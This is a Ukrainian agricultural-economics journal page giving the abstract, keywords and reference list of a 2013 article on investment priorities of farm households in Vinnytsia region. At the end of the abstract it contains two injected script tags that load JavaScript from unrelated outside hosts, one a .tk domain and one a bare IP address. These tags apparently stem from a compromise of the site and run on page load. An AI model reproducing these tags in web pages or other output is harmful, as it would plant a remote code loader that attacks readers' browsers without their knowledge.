ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.439
Аграрний менеджмент і підприємництво

Пріоритети інвестиційної діяльності фермерських господарств / Николюк О. Д. // Економіка АПК. - 2013. - № 5 - С. 67

Висвітлено основні аспекти інвестиційної діяльності фермерських господарств, її необхідність як в короткостроковій, так і довгостроковій перспективі. Проаналізовано динаміку інвестиційної активності, структуру капітальних інвестицій у 2007 та 2011 роках та показники розвитку фермерських господарств в динаміці за 2007 – 2011рр. Наведено основні пріоритетні напрями інвестиційної діяльності фермерських господарств Вінницької області залежно від природно-кліматичних умов їх діяльності, зокрема садівництва, яке є традиційним для даного регіону, розвиток нових і перспективних виробничих напрямів – переробних, обслуговуючих (переробка продукції овочівництва та плодівництва, їх технічна підтримка, розвиток сільського зеленого туризму та агротуризму). Визначено що при подальшій державній підтримці та самовдосконаленні фермерство стане однією з провідних форм господарювання на селі та забезпечуватиме виробництво необхідної продукції як для споживання населенням України, так і на експорт. Табл.: 2. Рис.: 2. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: фермерські господарства, інвестиційна діяльність, інвестиційна активність, капітальні інвестиції, капітальне будівництво, програма розвитку, державна підтримка розвитку

Список використаних джерел

  1. Bogatska N.M. Assessment of the investment potential of Vinnytsia region // N.M. Bogatska / [Electronic resource]: Access mode: http://www.rusnauka.com/10_NPE_2009/Economics/37863.doc.htm.
  2. Horovyy V.P. Investing in small business activity [Text] / V.P. Horovyy // Bulletin of Agricultural Science. - 2007. - № 5. – P. 69 – 73.
  3. Research capacity to support agriculture in Ukraine [E resource] Mode of access: www.efse.lu.
  4. Investments XXI century [electronic resource]: Special Issue Farmer Ukraine. - K.: 2012. - Mode of access: http://www.farmer.co.ua/ files/spec_2012.pdf.
  5. Kodenska M.U. Investment priorities in agricultural and industrial production / Agricultural economics // M.U. Kodenska. - K.: NSC IAE, 2010. - P. 49-53.
  6. Program of private peasant farms in Vinnytsia region to 2011-2015 [electronic resource]: Access mode: http://www.vin.gov.ua/web/upravlinnya/ web_upr_apk.nsf/web_alldocs/DocPGLEH.
  7. Sabluk P.T. Conceptual framework development and implementation of investment programs in the agro-industrial production / P.T. Sabluk, M.Y. Kodenska. – NSC IAE, 2012. – 46 p.
  8. Farms of Vinnytsia region for the year 2011 / edited. V.I. Pogorelsky. – Kiev: Ch. Exercise. Statistics in Vinnytsia region, 2012. - 94 p.
  9. Ukraine Sector Competitiveness Strategy, Agribusiness Working Group, internal working document, OECD, 2012, Paris.
Читати статтю: 13_05_11.pdf